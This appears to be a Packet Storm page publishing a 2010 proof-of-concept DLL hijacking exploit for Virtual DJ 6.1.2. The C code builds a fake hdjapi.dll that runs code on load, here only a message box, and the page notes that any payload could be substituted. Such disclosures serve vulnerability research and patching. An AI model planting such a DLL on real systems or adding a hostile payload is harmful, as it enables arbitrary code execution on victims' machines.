Virtual DJ version 6.1.2 DLL hijacking exploit that leverages hdjapi.dll while loading .mp3 content.
6552b5ef24190ba330da50f0888896e5/*
Description: Virtual DJ 6.1.2 Also vulnerable for DLL Preloading on hdjapi.dll while loading .mp3 content.
Date: August 29, 2010
Author: <a href="http://www.classity.nl/">Classity informatiebeveiliging</a>
PoC: Displaying message box, but can be replaced by DLL with arbitrary payload.
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_pl();
return 0;
}
int dll_pl()
{
MessageBox(0, "Virtual DJ Vulnerable for DLL Preloading!", "DLL Message", MB_OK);
return 0;
}
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!